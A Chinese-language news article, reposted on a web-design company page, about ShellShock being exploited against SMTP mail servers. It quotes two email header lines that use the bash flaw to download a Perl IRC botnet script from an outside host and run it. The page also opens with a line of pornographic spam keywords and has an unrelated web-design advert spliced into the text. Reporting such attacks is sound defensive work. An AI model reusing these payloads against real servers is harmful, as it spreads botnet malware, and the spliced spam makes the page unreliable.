日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
Bash破殼漏洞再變身:針對(duì)郵件服務(wù)器SMTP攻擊

Bash破殼漏洞(ShellShock,CVE-2014-6271)新的利用方法又來(lái)了!根據(jù)互聯(lián)網(wǎng)風(fēng)暴中心( SANS InternetStorm Center )最新消息:破殼漏洞最新利用方法引發(fā)的新一輪攻擊正在醞釀中,這一次,破殼漏洞形成的僵尸網(wǎng)絡(luò)利用的是郵件服務(wù)器SMTP主機(jī),目標(biāo)是全球SMTP網(wǎng)關(guān)!

在黃南州等地區(qū),都構(gòu)建了全面的區(qū)域性戰(zhàn)略布局,加強(qiáng)發(fā)展的系統(tǒng)性、市場(chǎng)前瞻性、產(chǎn)品創(chuàng)新能力,以專注、極致的服務(wù)理念,為客戶提供成都做網(wǎng)站、網(wǎng)站設(shè)計(jì) 網(wǎng)站設(shè)計(jì)制作定制開(kāi)發(fā),公司網(wǎng)站建設(shè),企業(yè)網(wǎng)站建設(shè),品牌網(wǎng)站制作,成都全網(wǎng)營(yíng)銷推廣,成都外貿(mào)網(wǎng)站建設(shè),黃南州網(wǎng)站建設(shè)費(fèi)用合理。

黑客們?cè)谠噲D破壞SMTP系統(tǒng)

“嘿,我的老板啊,這次互聯(lián)網(wǎng)風(fēng)暴意味著什么你造嗎?意味著我給你回郵件都是危險(xiǎn)的!”(算了,我不回你了啊= =)

這次“破殼”利用的就是感染SMTP網(wǎng)關(guān),試圖在MTAs / MDAs中尋找可利用弱點(diǎn),然后攻擊者把惡意代碼隱藏在消息數(shù)據(jù)報(bào)頭中!

互聯(lián)網(wǎng)風(fēng)暴中心描述了一個(gè)用Perl編寫的IRC DDoS Robot,其Payload擁有“獲取和執(zhí)行遠(yuǎn)程代碼的能力”。

下面一個(gè)圖片就是包含“破殼”有效載荷的初始郵件攻擊例子:

二進(jìn)制防御系統(tǒng)BDS(Binary Defense Systems)已經(jīng)主動(dòng)偵查到最新的攻擊細(xì)節(jié)。 那些已被破壞系統(tǒng)試圖通過(guò)破殼漏洞傳播僵尸網(wǎng)絡(luò),并在每個(gè)主要頭字段使用“破殼”漏洞下載僵尸網(wǎng)絡(luò)腳本。攻擊者利用的字段有:“To:”字段、“From:”字段、 “Subject”字段、 “Date:”字段、 “Message ID:” 等等還有其他未發(fā)現(xiàn)字段

Message-ID:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

References:() { :; };wget -O /tmp/.legend hxxp://190-94-251-41/legend.txt;killall -9 perl;perl /tmp/.legend

BDS還還透露:

“為了感染SMTP網(wǎng)關(guān),并把它添加到現(xiàn)有僵尸網(wǎng)絡(luò)設(shè)備中去,有一個(gè)curl/wget/fetch/perl/lwp/etc的方法正在試圖從耶利哥安全團(tuán)隊(duì)(Jericho Security Team)摧毀基于perl的僵尸網(wǎng)絡(luò)?!?/p>

自從九月初發(fā)現(xiàn)“破殼”起,彈震癥漏洞已經(jīng)針對(duì)目標(biāo),在不同類型的設(shè)備上重復(fù)利用了許多次。許多安全專家也相繼發(fā)現(xiàn)了多次利用“破殼”漏洞攻擊全球設(shè)備的僵尸網(wǎng)絡(luò),包括攻擊 VOIP系統(tǒng) 和利用競(jìng)選傳播惡意軟件的混亂的僵尸網(wǎng)絡(luò)。

蜜罐由專家AlienVault實(shí)驗(yàn)室檢測(cè)到試圖利用“破殼”漏洞的兩個(gè)不同惡意軟件樣本,消息披露至此不超過(guò)48小時(shí)。

9月底,火眼研究室(FireEye)也預(yù)言:“從惡意流量上觀察發(fā)現(xiàn),試圖利用Bash bug的大規(guī)模網(wǎng)絡(luò)攻擊正在路上。”


新聞標(biāo)題:Bash破殼漏洞再變身:針對(duì)郵件服務(wù)器SMTP攻擊
文章URL:http://www.5511xx.com/article/dpijcii.html